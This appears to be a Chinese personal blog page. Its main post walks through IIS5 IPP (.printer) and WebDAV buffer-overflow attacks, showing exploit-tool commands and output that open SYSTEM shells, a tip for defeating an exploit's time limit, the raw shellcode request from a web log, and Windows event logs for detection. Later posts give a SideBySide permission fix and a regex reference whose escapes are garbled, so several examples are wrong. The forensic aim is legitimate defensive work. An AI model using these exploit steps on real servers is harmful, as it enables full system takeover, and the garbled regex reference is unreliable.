weq 日志 - weq的个人空间 - 我爱玉-聚合空间

IIS5缓冲区溢出

2008-06-25 17:06:43

IIS5缓冲区溢出

我曾经粗略做了一个统计，WINDOWS涉及到溢出的漏洞稍微多于LINUX，而WINDOWS的大
量的溢出漏洞与IIS有关，所以没有IIS的WINDOWS的整体

安全性绝对要高于LINUX，这几句话涉及到了WINDOWS与LINUX之争，所以就不再多说
了，免得又引起无谓的“口水战”。

熟悉缓冲区溢出攻击必须对溢出的工作方式有所了解，由于本身溢出就是一个很大的课
题，所以我们只简单的介绍一下：如果一个程序没有限

制输入的字符长度或者检查输入长度是否正确，就会发生溢出。一个没有进行限制的输
入就有可能因为输入长度的问题“溢出”到CPU运行栈的

另一部分去，如果这个输入被精心的设计过，那么它可以被用来运行指定的代码。而
IIS运行的帐户环境是SYSTEM，所以通过溢出得到的是

SYSTEM权限，而SYSTEM权限是系统内的最高技术权限，因此IIS缓冲区溢出造成的灾难
往往是致命的。

IPP缓冲区溢出

这个漏洞比较早了，但是一直私下里认为这是一个很典型的IIS溢出漏洞攻击，所以又
翻了出来，这个漏洞存在于处理.printer文件的ISAPI过

滤器（c:\winnt\system32\msw3prt.dll）,它为WIN2000提供INTERNET打印协议，即IPP
的支持，可实现对网络打印机的基于WEB的控制，

在.printer ISAPI请求中，在HTTP HOST：头中发送420字节的缓冲区，就会发生溢出，

如下：

GET /NULL.PRINTER   HTTP/1.0
HOST： [BUFFER为420个字符]

发生溢出后IIS异常终止，但是为了2000为了保障WEB的弹性运行，这时会自动重新运行
IIS（inetinfo.exe）,在后面提供的日志里你可以充分

的注意到这一点。

互联网上流行的最成功的一个IPP漏洞利用工具是IIS5HACK，不过最近的这个工具的版
本好象都被加了木马。

操作如下：

E:\>iis5hack 192.168.0.87 80 0 1256
iis5 remote .printer overflow. writen by sunx
    http://www.sunx.org
    for test only, dont used to hack, :p

connecting...
sending...
checking...
Now you can telnet to 1256 port
good luck :)

E:\>

这时使用“telnet 192.168.0.87 1256”就可以连接到目标服务器上，我们可以看到目
标服务器系统装在H盘上。

http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

H:\WINNT\system32>

在这个过程里，IIS日志里一般不会出现记录，但是在事件查看器里的系统日志项目里
将会出现IIS各个组建停止的信息，安全项目里也将出现

以下的日志：

事件类型: 成功审核
事件来源: Security
事件种类: 系统事件
事件 ID: 515
日期:  2003-12-16
事件:  15:34:13
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
受信任的登录过程已经在本地安全机制机构注册。将信任这个登录过程来提交登录申
请。

登录过程名:  \inetinfo.exe

事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期:  2003-12-16
事件:  15:34:13
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
  服务器:  NT Local Security Authority / Authentication Service
  服务:  LsaRegisterLogonProcess()
  主要用户名: 123-DK8KIFN4NZR$
  主要域: SERVER
  主要登录 ID: (0x0,0x3E7)
  客户端用户名: 123-DK8KIFN4NZR$
  客户端域: SERVER
  客户端登录 ID: (0x0,0x3E7)
  特权: SeTcbPrivilege

事件类型: 成功审核
事件来源: Security
事件种类: 帐户登录
事件 ID: 680
日期:  2003-12-16
事件:  15:34:13
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
为登录所用的帐户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名:
  IUSR_123-DK8KIFN4NZR
工作站:
  123-DK8KIFN4NZR

事件类型: 成功审核
事件来源: Security
事件种类: 登录/注销
事件 ID: 540
日期:  2003-12-16
事件:  15:34:13
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
成功的网络登录:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x17FBA)
  登录类型: 3
  登录过程: IIS
  身份验证程序包: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
  工作站名: 123-DK8KIFN4NZR

事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 576
日期:  2003-12-16
事件:  15:34:13
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
指派给新登录的特殊权限:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x17FBA)
  已指派:  SeChangeNotifyPrivilege

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  15:34:57
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4282631840
  映象文件名: \WINNT\system32\dllhost.exe
  创建者过程 ID: 2258146112
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  15:34:58
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4280877088
  映象文件名: \WINNT\system32\cmd.exe
  创建者过程 ID: 4285625728
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

从上面我们可以看出，在判断溢出攻击的时候，仅仅靠WEB日志还是不够的，因为在发
生溢出的时候，IIS多半已经被停止了，无法提供给我们

更多的线索，需要更好的对攻击进行分析的话，需要我们多方位的入手。

WebDAV远程缓冲区溢出漏洞

WebDAV 是 HTTP 规范的行业标准扩展。“WebDAV”中的“DAV”代表“分布式创作和版
本控制”。WebDAV 为授权用户提供了在 Web 服务器上

远程添加和管理内容的能力。IIS5 默认提供了对WebDAV的支持，通过WebDAV可以通过
HTTP向用户提供远程文件存储的服务。但是作为普通的

HTTP服务器，这个功能没有必要。

IIS5包含的WebDAV组件不充分检查传递给部分系统组件的数据，远程攻击者利用这个漏
洞对WebDAV进行缓冲区溢出攻击，可能以WEB进程权限在

系统上执行任意指令。IIS 5.0的WebDAV使用了ntdll.dll中的一些函数，而这些函数存
在一个缓冲区溢出漏洞。通过对WebDAV的畸形请求可以

触发这个溢出。成功利用这个漏洞可以获得LocalSystem权限。这意味着，入侵者可以
获得主机的完全控制能力。任何能够将 WebDAV 请求传输

到受影响的 Web 服务器的用户都可以尝试利用此弱点。由于 WebDAV 请求是在 HTTP
所在的同一端口（通常是端口 80）上传输，这实质上意

味着任何能够与受影响的服务器建立连接的用户都可以尝试利用此弱点。

网络上WebDAV攻击工具非常的多，使用也很简单，所以造成了前一段时间WEBDAV攻击泛
滥，

其中最著名的是WEBDAVX3，需要注意的是这个程序是有时间期限的，但是可以通过调整
系统时间的方法解决，比如说将时间调回2002年，这并不会影响这个程序的使用。

C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... （IIS正在重起）
try offset: -4

在这一时候计算机会有一段长时间停止，只需要使用^C短开，就可以使用NC或者TELNET
连上去了。

C:\>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

以下是遭到WEBDAV溢出攻击后的WEB日志主要特征：

2003-12-16 05:51:38 192.168.0.235 - 192.168.0.87 80 LOCK

/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAA契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契
桘杲楜厐晞暭餽畠囸噖晟暭丽琀連愬傐晙邭愬咍炈咍邊咍

炊咍邊塒璪痘郖偘偐郃悙

ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpainlnpepppppp
gekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppile

fpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdneoeoeoe
ohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfj

fihfokppogolpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoihh
ppppppcecececeNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN -
400 -

在事件查看器里的系统日志项目里将会出现IIS各个组件停止的信息，安全项目里也将
出现

以下的日志：

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:02
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4281625184
  映象文件名: \WINNT\system32\iisreset.exe
  创建者过程 ID: 2171497184
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:03
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 2276659232
  映象文件名: \WINNT\system32\inetsrv\iisrstas.exe
  创建者过程 ID: 2244638496
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:03
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4274700320
  映象文件名: \WINNT\system32\inetsrv\inetinfo.exe
  创建者过程 ID: 2171497184
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期:  2003-12-16
事件:  13:52:03
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
  服务器:  NT Local Security Authority / Authentication Service
  服务:  LsaRegisterLogonProcess()
  主要用户名: 123-DK8KIFN4NZR$
  主要域: SERVER
  主要登录 ID: (0x0,0x3E7)
  客户端用户名: 123-DK8KIFN4NZR$
  客户端域: SERVER
  客户端登录 ID: (0x0,0x3E7)
  特权: SeTcbPrivilege

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 593
日期:  2003-12-16
事件:  13:52:10
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经退出某过程:
  过程 ID: 832
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 593
日期:  2003-12-16
事件:  13:52:16
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经退出某过程:
  过程 ID: 980
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

事件类型: 成功审核
事件来源: Security
事件种类: 系统事件
事件 ID: 515
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
受信任的登录过程已经在本地安全机制机构注册。将信任这个登录过程来提交登录申
请。

登录过程名:  \inetinfo.exe

事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
  服务器:  NT Local Security Authority / Authentication Service
  服务:  LsaRegisterLogonProcess()
  主要用户名: 123-DK8KIFN4NZR$
  主要域: SERVER
  主要登录 ID: (0x0,0x3E7)
  客户端用户名: 123-DK8KIFN4NZR$
  客户端域: SERVER
  客户端登录 ID: (0x0,0x3E7)
  特权: SeTcbPrivilege

事件类型: 成功审核
事件来源: Security
事件种类: 帐户登录
事件 ID: 680
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
为登录所用的帐户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名:
  IUSR_123-DK8KIFN4NZR
工作站:
  123-DK8KIFN4NZR

事件类型: 成功审核
事件来源: Security
事件种类: 登录/注销
事件 ID: 540
日期:  2003-12-16
事件:  13:52:25
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
成功的网络登录:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x1D0EFE)
  登录类型: 3
  登录过程: IIS
  身份验证程序包: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
  工作站名: 123-DK8KIFN4NZR

事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 576
日期:  2003-12-16
事件:  13:52:25
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
指派给新登录的特殊权限:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x1D0EFE)
  已指派:  SeChangeNotifyPrivilege

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4276928544
  映象文件名: \WINNT\system32\cmd.exe
  创建者过程 ID: 4274700320
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

需要注意的是，在WEBDAV溢出的过程中IIS会产生多次重复启动，而在WEB的日志里并不
能看出这一点，而这一点在事件查看器里的系统日志里和安全日志里都可以清楚的看
到。

关于WEBDAV的防范措施与本主题无关，且网络上很多地方提供了，就不赘述了。

查看(14) 评论(0) 收藏分享管理
SideBySide错误解决方法

2008-06-25 16:32:09

Generate Activation Context 为 C:\WINDOWS\system32\TAPI32.dll 失败。参考错误消息: 拒绝访问。

Resolve Partial Assembly 为 Microsoft.Windows.Common-Controls 失败。参考错误消息: 拒绝访问。

Generate Activation Context 为 C:\WINDOWS\system32\mlang.dll 失败。参考错误消息: 拒绝访问。

Generate Activation Context 为 C:\WINDOWS\system32\urlmon.dll 失败。参考错误消息: 拒绝访问。

这些错误都是因为权限设置过严造成的。
解决办法：给USERS用户组读取C:\WINDOWS\system32目录的权限。

查看(28) 评论(0) 收藏分享管理

正则表达式中的特殊字符

2008-06-01 15:21:15

字符/
意义：对于字符，通常表示按字面意义，指出接着的字符为特殊字符，不作解释。
例如：/b/匹配字符’b’,通过在b 前面加一个反斜杠，也就是/b/，则该字符变成特殊字符，表示
匹配一个单词的分界线。
或者：
对于几个字符，通常说明是特殊的，指出紧接着的字符不是特殊的，而应该按字面解释。
例如：*是一个特殊字符，匹配任意个字符(包括0个字符)；例如：/a*/意味匹配0个或多个a。为了匹配字面上的*，在a前面加一个反斜杠；例如：/a*/匹配’a*’。

字符^
意义：表示匹配的字符必须在最前边。
例如：/^A/不匹配"an A,"中的’A’，但匹配"An A."中最前面的’A’。

字符$
意义：与^类似，匹配最末的字符。
例如：/t$/不匹配"eater"中的’t’，但匹配"eat"中的’t’。

字符*
意义：匹配*前面的字符0次或n次。
例如:/bo*/匹配"A ghost booooed"中的’boooo’或"A bird warbled"中的’b’，但不匹配"Agoat g
runted"中的任何字符。

字符+
意义：匹配+号前面的字符1次或n次。等价于{1,}。
例如：/a+/匹配"candy"中的’a’和"caaaaaaandy."中的所有’a’。

字符?
意义：匹配?前面的字符0次或1次。
例如：/e?le?/匹配"angel"中的’el’和"angle."中的’le’。

字符.
意义：(小数点)匹配除换行符外的所有单个的字符。
例如：/.n/匹配"nay, an apple is on the tree"中的’an’和’on’，但不匹配’nay’。

字符(x)
意义：匹配’x’并记录匹配的值。
例如：/(foo)/匹配和记录"foo bar."中的’foo’。匹配子串能被结果数组中的素[1], ...,[n] 返
回，或被RegExp对象的属性, ..., 返回。

字符x│y
意义：匹配’x’或者’y’。
例如：/green│red/匹配"green apple"中的’green’和"red apple."中的’red’。

字符{ n }
意义：这里的n是一个正整数。匹配前面的n个字符。
例如：/a{ 2 }/不匹配"candy,"中的’a’，但匹配"caandy," 中的所有’a’和"caaandy."中前面的两个’a’。

字符{ n, }
意义：这里的n是一个正整数。匹配至少n个前面的字符。
例如：/a{ 2, }不匹配"candy"中的’a’，但匹配"caandy"中的所有’a’和"caaaaaaandy."中的所有’a’

字符{ n,m }
意义：这里的n和m都是正整数。匹配至少n个最多m个前面的字符。
例如：/a{ 1,3 }/不匹配"cndy"中的任何字符，但匹配 "candy,"中的’a’，"caandy," 中的前面两个
’a’和"caaaaaaandy"中前面的三个’a’，注意：即使"caaaaaaandy" 中有很多个’a’，但只匹配前面的三个’a’即"aaa"。

字符[xyz]
意义：一字符列表，匹配列出中的任一字符。你可以通过连字符-指出一个字符范围。
例如：[abcd]跟[a-c]一样。它们匹配"brisket"中的’b’和"ache"中的’c’。

字符[^xyz]
意义：一字符补集，也就是说，它匹配除了列出的字符外的所有东西。你可以使用连字符-指出一字符范围。
例如：[^abc]和[^a-c]等价，它们最早匹配"brisket"中的’r’和"chop."中的’h’。

字符
意义：匹配一个空格(不要与b混淆)

字符b
意义：匹配一个单词的分界线，比如一个空格(不要与混淆)
例如：/bnw/匹配"noonday"中的’no’，/wyb/匹配"possibly yesterday."中的’ly’。

字符B
意义：匹配一个单词的非分界线
例如：/wBn/匹配"noonday"中的’on’，/yBw/匹配"possibly yesterday."中的’ye’。

字符cX
意义：这里的X是一个控制字符。匹配一个字符串的控制字符。
例如：/cM/匹配一个字符串中的control-M。

字符d
意义：匹配一个数字，等价于[0-9]。
例如：/d/或/[0-9]/匹配"B2 is the suite number."中的’2’。

字符D
意义：匹配任何的非数字，等价于[^0-9]。
例如：/D/或/[^0-9]/匹配"B2 is the suite number."中的’B’。

字符f
意义：匹配一个表单符

字符n
意义：匹配一个换行符

字符r
意义：匹配一个回车符

字符s
意义：匹配一个单个white空格符，包括空格，tab，form feed，换行符，等价于[ fnrtv]。
例如：/sw*/匹配"foo bar."中的’ bar’。

字符S
意义：匹配除white空格符以外的一个单个的字符，等价于[^ fnrtv]。
例如：/S/w*匹配"foo bar."中的’foo’。

字符t
意义：匹配一个制表符

字符v
意义：匹配一个顶头制表符

字符w
意义：匹配所有的数字和字母以及下划线，等价于[A-Za-z0-9_]。
例如：/w/匹配"apple,"中的’a’，".28,"中的’5’和"3D."中的’3’。

字符W
意义：匹配除数字、字母外及下划线外的其它字符，等价于[^A-Za-z0-9_]。
例如：/W/或者/[^$A-Za-z0-9_]/匹配"50%."中的’%’。

字符n
意义：这里的n是一个正整数。匹配一个正则表达式的最后一个子串的n的值(计数左圆括号)。

例如：/apple(,)sorange1/匹配"apple, orange, cherry, peach."中的’apple, orange’，下面有一个更加完整的例子。
注意：如果左圆括号中的数字比n指定的数字还小，则n取下一行的八进制escape作为描述。

字符ooctal和xhex
意义：这里的ooctal是一个八进制的escape值，而xhex是一个十六进制的escape值，允许在一个正则表达式中嵌入ASCII码

附:下表是元字符及其在正则表达式上下文中的行为的一个完整列表：

字符 描述 
\
将下一个字符标记为一个特殊字符、或一个原义字符、或一个后向引用、或一个八进制转义符。例如，'n' 匹配字符 "n"。'\n' 匹配一个换行符。序列 '\' 匹配 "" 而 "\(" 则匹配 "("。
^
匹配输入字符串的开始位置。如果设置了 RegExp 对象的 Multiline 属性，^ 也匹配 '\n' 或 '\r' 之后的位置。
$
匹配输入字符串的结束位置。如果设置了RegExp 对象的 Multiline 属性，$ 也匹配 '\n' 或 '\r' 之前的位置。
*
匹配前面的子表达式零次或多次。例如，zo* 能匹配 "z" 以及 "zoo"。 * 等价于{0,}。
+ 匹配前面的子表达式一次或多次。例如，'zo+' 能匹配 "zo" 以及 "zoo"，但不能匹配 "z"。+ 等价于 {1,}。
?
匹配前面的子表达式零次或一次。例如，"do(es)?" 可以匹配 "do" 或 "does" 中的"do" 。? 等价于 {0,1}。
{n}
n 是一个非负整数。匹配确定的 n 次。例如，'o{2}' 不能匹配 "Bob" 中的 'o'，但是能匹配 "food" 中的两个 o。
{n,}
n 是一个非负整数。至少匹配n 次。例如，'o{2,}' 不能匹配 "Bob" 中的 'o'，但能匹配 "foooood" 中的所有 o。'o{1,}' 等价于 'o+'。'o{0,}' 则等价于 'o*'。
{n,m}
m 和 n 均为非负整数，其中n <= m。最少匹配 n 次且最多匹配 m 次。刘， "o{1,3}" 将匹配 "fooooood" 中的前三个 o。'o{0,1}' 等价于 'o?'。请注意在逗号和两个数之间不能有空格。
?
当该字符紧跟在任何一个其他限制符 (*, +, ?, {n}, {n,}, {n,m}) 后面时，匹配模式是非贪婪的。非贪婪模式尽可能少的匹配所搜索的字符串，而默认的贪婪模式则尽可能多的匹配所搜索的字符串。例如，对于字符串 "oooo"，'o+?' 将匹配单个 "o"，而 'o+' 将匹配所有 'o'。
. 
匹配除 "\n" 之外的任何单个字符。要匹配包括 '\n' 在内的任何字符，请使用象 '[.\n]' 的模式。
(pattern)
匹配pattern 并获取这一匹配。所获取的匹配可以从产生的 Matches 集合得到，在VBScript 中使用 SubMatches 集合，在JScript 中则使用 {CONTENT}… 属性。要匹配圆括号字符，请使用 '\(' 或 '\)'。
(?:pattern)
匹配 pattern 但不获取匹配结果，也就是说这是一个非获取匹配，不进行存储供以后使用。这在使用 "或" 字符 (|) 来组合一个模式的各个部分是很有用。例如， 'industr(?:y|ies) 就是一个比 'industry|industries' 更简略的表达式。
(?=pattern)
